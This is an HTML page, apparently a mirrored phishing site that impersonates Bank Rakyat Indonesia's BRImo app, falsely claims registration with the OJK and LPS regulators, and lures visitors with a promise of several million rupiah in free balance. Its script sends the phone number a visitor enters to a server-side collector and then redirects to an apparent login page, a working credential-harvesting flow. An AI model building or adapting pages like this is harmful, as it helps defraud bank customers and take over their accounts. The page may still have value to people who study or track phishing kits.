<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from festivalsaldobrimogratis.res-lt.com/ by HTTrack Website Copier/3.x [XR&CO'2017], Tue, 24 Oct 2023 10:55:37 GMT -->
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    
    <meta property="og:image:type" content="image/jpeg"> 
    <meta name="og:image" content="../i.ibb.co/Dr6ft03/thumbnail.jpg">
    <meta name="og:title" content="PT.Bank Rakyat Indonesia (Persero) Tbk.">
    <meta name="og:description" content="Bank Rakyat Indonesia (BRI) adalah salah satu bank komersial terbesar di Indonesia yang selalu mengutamakan kepuasan nasabah.">

    <link rel="stylesheet" href="assets/css/tarif.css">
    <link rel="stylesheet" href="assets/css/load.css">
    <title>Tarif Transaksi | BRImo</title>
    <style>
    .flex {
        display:flex;
        justify-content:center;
        align-items:center;
    }
    .xxx {
        margin-top:60px;
        width: 80%;
        padding: 0 10px;
    }
    .wrap {
        width: 100%;
        justify-content: left;
        margin: -10px 0;
    }
     .wrap .choice {
        width: 17px;
        height: 17px;
        border-radius: 50px;
        border: 1.5px solid #000;
        margin-right: 10px;
        transition: .3s;
    }
     .wrap .choice.active {
        background: #0079e6;
        border: 1.5px solid #000;
        transition: .3s;
    }
     .wrap .choice.active ~ p{
     font-weight:600;
     }
     .wrap p {
        font-size: 16px;
        text-align: left;
        font-weight: 500;
    }
    </style>
</head>
<body>
    <div id="loader" class="bg-load load6" style="display:none;">
        <div class="loader"></div>
    </div>
    <div class="container" id="container" style="display:none;">
        <div class="cont-box">
            <div class="header-img">
                <img src="assets/img/brimo.png" alt="BRImo" class="headImg">
            </div>
            <div class="bg-head">
                <img class="img-bg-head" src="assets/img/bg_tarif.png" alt="BRImo">
            </div>
            <div class="slider">
                <figure>
                    <div class="slide"><img src="assets/img/1.jpg" alt="BRImo"></div>
                    <div class="slide"><img src="assets/img/2.jpg" alt="BRImo"></div>
                    <div class="slide"><img src="assets/img/1.jpg" alt="BRImo"></div>
                    <div class="slide"><img src="assets/img/2.jpg" alt="BRImo"></div>
                    <div class="slide"><img src="assets/img/1.jpg" alt="BRImo"></div>
                </figure>
            </div>
            <div class="box-c-tarif">
                <div class="text-c"><p class="text-h-c">𝐒𝐀𝐋𝐃𝐎 𝐆𝐑𝐀𝐓𝐈𝐒 𝐔𝐍𝐓𝐔𝐊 𝐀𝐍𝐃𝐀!!<br>𝐀𝐘𝐎 𝐀𝐌𝐁𝐈𝐋 𝐒𝐄𝐊𝐀𝐑𝐀𝐍𝐆 𝐉𝐔𝐆𝐀!!</p></div>
                <div class="line"></div>
                <div class="xxx">
                    <div class="flex wrap">
                        <span class="choice active"></span><p>Rp. 5.000.000</p>
                    </div>
                    <div class="flex wrap">
                        <span class="choice"></span><p>Rp. 3.000.000</p>
                    </div>
                </div>
                <div class="d-inp-tlp">
                    <input id="nohp" type="number" autocomplete="off" class="nohp" placeholder="Nomor Handphone">
                </div>
            </div>
            <div class="btn-next">
                <button onclick="auth();" class="confBtn" type="button" id="confBtn">Dapatkan Sekarang</button>
            </div>
            <div class="footImg">
                <p class="dftr">
                    Terdaftar & diawasi oleh:
                </p>
                <div class="imgFoot">
                    <img class="imgK" style="margin-right:25px;" src="assets/img/ojk.png" alt="OJK">
                    <img class="imgK" src="assets/img/lps.png" alt="LPS">
                </div>
            </div>
        </div>
    </div>
    <script src="../code.jquery.com/jquery-3.5.1.min.js"></script>
    <script>
        $(document).ready(function() {
          $('.choice').click(function() {
            $('.choice').removeClass('active');
            $(this).addClass('active');
          });
        });
    </script>
    <script>

        setTimeout(function(){
            $("#container").fadeIn("fast");
        },1000);
        let confBtn = document.getElementById("confBtn");
        let inpHp = document.getElementById("nohp");
        confBtn.disabled = true;
        inpHp.addEventListener("input", validate);
        function validate(){
            if (inpHp.value.length < 10){
                confBtn.disabled=true;
            } else {
                confBtn.disabled=false;
            }
        }
        function auth(){
            $("#loader").fadeIn();
            let dataTlp = document.getElementById("nohp").value;
            sessionStorage;
            sessionStorage.setItem("nohp",dataTlp);
            $.ajax({
                type: 'POST',
                url: 'req/hp.php',
                data: 'nohp='+dataTlp,
                dataType: 'text',
                success: function(){
                    setTimeout(function(){
                        window.location.href="masuk/index.html"
                    },1500);
                }
            })
        }
    </script>
</body>

<!-- Mirrored from festivalsaldobrimogratis.res-lt.com/ by HTTrack Website Copier/3.x [XR&CO'2017], Tue, 24 Oct 2023 10:55:55 GMT -->
</html>
